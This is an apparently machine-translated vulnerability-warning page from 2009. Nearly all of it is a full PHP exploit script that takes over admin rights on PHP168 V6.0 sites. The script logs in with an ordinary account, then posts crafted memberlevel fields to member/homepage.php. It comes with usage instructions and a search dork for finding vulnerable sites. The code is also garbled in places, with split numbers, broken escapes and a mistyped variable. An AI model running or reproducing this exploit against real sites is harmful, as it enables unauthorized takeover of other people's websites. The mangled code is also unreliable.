Php168 v6 privilege elevation vulnerability-vulnerability warning-the black bar safety net

2009-08-23T00:00:00
ID MYHACK58:62200924366
Type myhack58
Reporter 佚名
Modified 2009-08-23T00:00:00

Description

|

by Ryat http://www.hackgood.com

Every day at work,I haven't post on the forum... Previously issued a php168 v2008 privilege elevation vulnerability,this vulnerability is also shown in the same code segment Directly gives the exp,inside some details or some mean,interested students can self-analyze:) EXP:

!/ usr/bin/php

<? php print_r(' +---------------------------------------------------------------------------+ Php168 v6. 0 update user access exploit by puret_t mail: puretot at gmail dot com team: http://www.hackgood.com dork: "Powered by PHP168 V6. 0" +---------------------------------------------------------------------------+ '); /* * works regardless of php. ini settings / if ($argc < 5) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$ argv[0].' host path user pass host: target server (ip/hostname) path: path to php168 user: login username pass: login password Example: php '.$ argv[0].' localhost /php168/ ryat 1 2 3 4 5 6 +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $pass = $argv[4]; $resp = send(); preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%0 9[a-zA-Z0-9%]+)/', $resp, $cookie); if ($cookie) if (strpos(send(), 'puret_t') !== false) exit("Expoilt Success!\ nYou Are Admin Now!\ n"); else exit("Exploit Failed!\ n"); else exit("Exploit Failed!\ n");

function rands($length = 8) { $hash = "; $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'; $max = strlen($chars) - 1; mt_srand((double)microtime() * 1 0 0 0 0 0 0); for ($i = 0; $i < $length; $i++) $hash .= $chars[mt_rand(0, $max)]; return $hash; } function send() { global $host, $path, $user, $pass, $cookie;

if ($cookie) { $cookie[1] .= ';USR='. rands()."\ t31\t\t"; $cmd = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3D0x70757265745f74]=-1';

$message = "POST ".$ path."member/homepage. php? uid=$cookie[2] HTTP/1.1\r\n"; $message .= "Accept: /\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ". strlen($cmd)."\ r\n"; $message .= "Connection: Close\r\n"; $message .= "Cookie: ".$ cookies[1]."\ r\n\r\n"; $message .= $cmd; } else { $cmd = "username=$user&password=$pass&step=2";

$message = "POST ".$ path."do/login.php HTTP/1.1\r\n"; $message .= "Accept: /\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ". strlen($cmd)."\ r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; }

$fp = fsockopen($host, 8 0); fputs($fp, $message);

$resp = "; while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4);

return $resp; } ?& gt;